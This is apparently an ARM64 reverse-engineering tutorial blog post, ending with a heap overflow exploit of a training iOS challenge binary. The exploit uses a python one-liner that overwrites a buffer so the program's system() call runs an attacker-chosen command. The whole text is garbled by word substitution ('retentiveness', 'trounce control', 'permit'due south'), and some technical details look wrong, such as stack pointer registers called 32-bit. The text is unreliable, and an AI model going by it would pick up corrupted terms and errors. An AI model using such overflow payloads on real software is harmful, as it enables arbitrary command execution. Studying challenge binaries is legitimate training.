Hi Anybody ! In this blog series, we will be understanding the ARM teaching gear up and using that to opposite ARM Binaries followed by writing exploits for them. Then permit'due south outset with the nuts of ARM64.

ARM64 Intro

ARM64 is a family unit of RISC (reduced didactics set computer) architecture. The distinguishing cistron of a RISC compages is the use of a small, highly-optimized gear up of instructions, rather than the more specialized prepare often found in other types of compages (for e.g CISC). ARM64 follows the Load/Shop approach, in which both operands and destination must be in registers. The load–store architecture is an instruction set compages that divides instructions into two categories: retentivity access (load and shop betwixt retention and registers), and ALU operations (which just occur between registers). This differs from a register–retentiveness architecture (for example, a CISC instruction set architecture such as x86) in which one of the operands for the ADD performance may exist in retention, while the other is in a register. Using ARM architecture is ideal for mobile devices, since the RISC architecture requires few transistors, and hence leads to less power consumption and heating of the device, thereby leading to a better battery life which is essential for mobile devices.

Both the electric current iOS and Android phones use ARM processors, and the newer ones use ARM64 in specific. Reversing ARM64 assembly code is therefore vital to understanding the internal workings of a binary or whatsoever binary/app. It is impossible to embrace the whole ARM64 instruction set in this blog series and hence nosotros will be focusing on the nearly useful instructions and the nigh commonly used registers. It is also important to note that ARM64 is also referred every bit ARMv8 (eight.ane, 8.iii etc) while ARM32 is ARMv7(southward).

ARMv8 (ARM64) maintains compatibility with existing 32-chip architecture by using two execution states - Aarch32 and Aarch64. In Aarch32 state, the processor can simply access 32-bit registers. In Aarch64 state, the processor can access 32-bit and 64-chip registers. ARM64 several general-purpose and special-purpose registers. The full general-purpose registers are those which practise not have side effects, and hence can be used past most instructions. One tin do arithmetic with them, use them for retentiveness addresses, and so on. The special purpose registers as well do not accept side effect, just tin can only exist used for certain purposes and merely by certain instructions. Other instructions may depend on their values implicitly. One example for this is the Stack Pointer register. And and then we have Control-registers - these registers have side effects. On an ARM64 these are registers like TTBR (Translation table base of operations register), which holds the base arrow of the electric current page tables. Many of these volition be privileged and tin only exist used by kernel code. Some Command registers still can be used by anyone. In the below epitome we tin run across some control registers from the XNU Kernel.

1 Example of some command registers used in the iOS kernel

The modern OS expects to have several privilege levels which it can use to control access to resources. An example of this is the split between the kernel and the userland. Armv8 enables this split by implementing different levels of privilege, which are referred to as Exception levels in the Armv8-A architecture. ARMv8 has several exception levels that are numbered (EL0, EL1 etc), the higher the number the higher the privilege. When taking an exception, the exception level can either increment or remain the same. Withal, when returning from an exception, the exception level can either decrease or remain the same. Execution state (Aarch32 or Aarch64) can alter by taking or returning from an exception. On powerup, the device enters the highest exception level.

In terms of privilege EL0 < EL1 < EL2 < EL3

1 Instance of Exception levels in ARM

ARM64 Registers

The following list defines the dissimilar ARM64 registers and their purpose

  • x0-x30 are 64-scrap general purpose registers. Their bottom halves tin exist accessed via w0-w30.
  • There are four stack pointer registers SP\_EL0, SP\_EL1, SP\_EL2, SP\_EL3 (each for dissimilar execution levels) which are 32-bit wide. Apart from that there are three exception link registers ELR\_EL1, ELR\_EL2, ELR\_EL3, three saved programme status registers SPSR\_EL1, SPSR\_EL2, SPSR\_EL3, and one Programme Counter registers (PC).
  • Arm also uses PC Relative addressing - wherein it specifies the operand accost relative to the PC (base address) - This helps in giving out Position independent code.
  • In ARM64 (unlike ARM32), the PC cannot be accessed past about instructions, especially not directly. The PC is modified indirectly using jump or stack-related instructions.
  • Similarly, the SP (Stack pointer) annals is never modified implicitly (for eastward.g. using push button/pop calls).
  • The Current Programme Status Register (CPSR) holds the aforementioned plan status flags as the APSR along with some boosted information.
  • Starting time register in opcode is usually destination, rest are source (except for str, stp)
Registers Purpose
x0 -x7 Arguments (up to 8) - Rest on stack
x8 -x18 General purpose, agree variables. No assumptions tin exist fabricated upon returning from a function
x19 -x28 If used by a office, must have their values preserved and later restored upon returning to the caller
x29 (fp) Frame Pointer (points to lesser of frame)
x30 (lr) Link Register. Holds the return address of a call
x16 Holds the arrangement call # in (SVC 0x80) call
x31 (sp/(x/westward)zr) Stack Pointer (sp) or zero annals(xzr or wzr)
PC Program Counter Register. Contains the address of the next instruction to be executed
APSR / CPSR Electric current Program status register (holds flags)

ARM64 calling convention

  • Arguments are passed in x0-x7 registers, rest are passed on the stack
  • ret control is used to render to address in Link register (default value is x30)
  • Return value of the function is stored in x0 or x0+x1 depending if its 64-chip or 128-bit
  • x8 is the indirect event register, used to pass the address location of an indirect issue, for example, where a role returns a large structure
  • Co-operative to a office happens using the B opcode.
  • Branch with link (BL) copies the address of the next instruction (after the BL) into the link register (x30) before branching
  • BL is hence used for subroutine calls
  • BR telephone call is used to co-operative to annals, for due east.yard br x8
  • BLR code is used to branch to annals and store the accost of the next instruction (after the BL) into the link register (x30)

ARM Opcodes

Opcodes Purpose
MOV Move one annals to another
MOVN Motility negative value to register
MOVK Move xvi-bits into register and go out the residue unchanged
MOVZ Movement shifted 16-flake registers, leaving the residual unchanged
lsl/lsr Logical shift left, Logical shift correct
ldr Load register
str Shop register
ldp/stp load/store 2 registers behind each other
adr Address of label at PC-relative commencement
adrp Address of page at PC-relative offset
cmp Compare 2 values, flags are updated automatically (Northward - result bit 31, Z if result zero, V if overflow, C if Not borrow)
bne Branch if zero flag is non set

System Registers

Apart from this, at that place might be some organization specific registers equally well, which are available only on that particular Bone. For e.yard, the below registers are present in iOS

1

Reading/Writing System Registers

MRS , systemreg -> Read from system annals into destination register Xt

MSR , systemreg -> Write to system register the value stored in Xt register

For eastward.g utilise MSR PAN, #1 to fix the PAN bit and MSR PAN, #0 to clear the PAN fleck

Part Prologue/Epilogue

Prologue - Appears at the get-go of the role, prepares the stack and registers for utilize within the function</li>

Epilogue - Appears at the end of the function, restores the stack and registers to the original land before function call</li>

1 Function Prologue/Epilogue

Examples

  • mov x0, x1 -> x0 = x1
  • movn x0, 1 -> x0 = -1
  • add together x0, x1 -> x0 = x0 + x1
  • ldr x0, [x1] -> x0 = *x1 -> x0 = address stored in x1
  • ldr x0, [x1, 0x10]! ->  x1 += 0x10; x0 = *x1(Pre-Indexing mode)
  • ldr x0, [x1], 0x10 -> x0 = *x1; x1 += 0x10 (Post-Indexing mode)
  • str x0, [x1] -> *x1 = x0 -> Destination is on the correct
  • ldr x0, [x1, 0x10] -> x0 = *(x1 + 0x10)
  • ldrb w0, [x1] -> Load a byte from address stored in x1
  • ldrsb w0, [x1] -> Load a signed byte from address stored in x1
  • adr x0, label -> Load accost of labels into x0
  • stp x0, x1, [x2] ->  *x2 = x0; *(x2 + 8) = x1
  • stp x29, x30, [sp, -64]! -> store x29, x30 (LR) on stack
  • ldp x29, x30, [sp], 64] -> Restore x29, x30 (LR) from the stack
  • svc 0 -> Perform a syscall (syscall number x16 register)
  • str x0, [x29] -> store x0 at the accost in x29 (destination on correct)
  • ldr x0, [x29] -> load the value from the accost in x29 into x0
  • blr x0 -> calls the subroutine at the address stored in x0, store side by side instruction in link register (x30)
  • br x0 -> Leap to address stored in x0
  • bl label -> Branch to label, store next instruction in link register (x30)
  • bl printf -> Call the printf part with arguments stored x0, x1
  • ret -> Jump to the address stored in x30

A Unproblematic Heap Overflow

Let'due south write a uncomplicated Heap overflow exploit for an ARM binary.

Your task is to exploit a heap overflow vulnerability in the vuln binary to execute a control of your choice. The binaries are compiled for the iOS platform so need to be run on a jailbroken iOS device.

The binaries for this and the next article can be found here

SSH to your Corellium (or jailbroken iOS) device and run the vuln binary

$ vuln

Run the binary vuln. You get a bulletin that says "Improve luck next time"

1

Allow's open up the binary in Hopper to see what's going on. Let'due south have a look at the main function.

1

Then, it'southward clear what we need to do to bound to the function heapOverflow

In social club to practise that, the post-obit requirements must be met

  1. Pass three arguments (or 2 because the starting time argument in a C program is the command with which the program is invoked)
  2. argv[1] should be the string "heap"
  3. argv[2] should be some statement that gets passed every bit the first statement to the role heapOverflow

Only to think

A main function in C has the prototype

int main(int argc, char **argv)

argc - An integer that contains the count of arguments that follow in argv. The argc parameter is always greater than or equal to 1.

argv - An array of null-terminated strings representing command-line arguments entered by the user of the plan. By convention, argv[0] is the command with which the plan is invoked, argv[1] is the first command-line statement, and so on, until argv[argc], which is always Zilch

Let's also accept a look at the PseudoCode of the heapOverflow function. Notation that the PseudoCode shows upwardly for 32-scrap arch merely still gives you lot a good idea of the programme menses.

1

So information technology seems like it tries to open a file with the name as the get-go argument which is passed to it.

At the end, at that place is also a call to the system function which executes a command, the input is the r22 (or x22) register

The allocation for r21 (x21) is 0x400 bytes, which is read using the following fread command

fread(r21, 0x1, r20, r19);

Permit'southward create a simple file on the device and pass it as input to the vuln binary.

echo "Howdy World" > input.txt ./vuln heap input.txt

1

Then information technology seems like information technology prints out the input for the whoami command

Let's cheat a chip to look at the Source code itself

                                  void                  heapOverflow                  (                  char                  *                  filename                  ){                  printf                  (                  "Heap overflow claiming. Execute a trounce command of your pick on the device                  \n                  "                  );                  printf                  (                  "Welcome: from %s, printing out the electric current user                  \n                  "                  ,                  filename                  );                  FILE                  *                  f                  =                  fopen                  (                  filename                  ,                  "rb"                  );                  fseek                  (                  f                  ,                  0                  ,                  SEEK_END                  );                  size_t                  fs                  =                  ftell                  (                  f                  );                  fseek                  (                  f                  ,                  0                  ,                  SEEK_SET                  );                  char                  *                  name                  =                  malloc                  (                  0x400                  );                  char                  *                  command                  =                  malloc                  (                  0x400                  );                  strcpy                  (                  command                  ,                  "whoami"                  );                  fread                  (                  name                  ,                  1                  ,                  fs                  ,                  f                  );                  system                  (                  command                  );                  return                  ;                  }                              

Sure enough, passing a file with length more than 0x400 bytes will overflow the adjacent memory and might end up alluvion the string "command", and thus when the organization call is fabricated, we might be able to call our own commands.

On the Corellium device, employ the following command to generate the malicious file

python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt

Then pass it as input to the binary.

vuln heap hax.txt

1

Instead of the whoami command, the ls control gets executed.

Tin can yous endeavor and go a shell on the device using this ?

References

  • https://github.com/Siguza/ios-resources/blob/chief/bits/arm64.md
  • https://github.com/Billy-Ellis/Exploit-Challenges
  • https://developer.arm.com/documentation/ddi0487/latest/arm-compages-reference-manual-armv8-for-armv8-a-architecture-profile https://exploit.teaching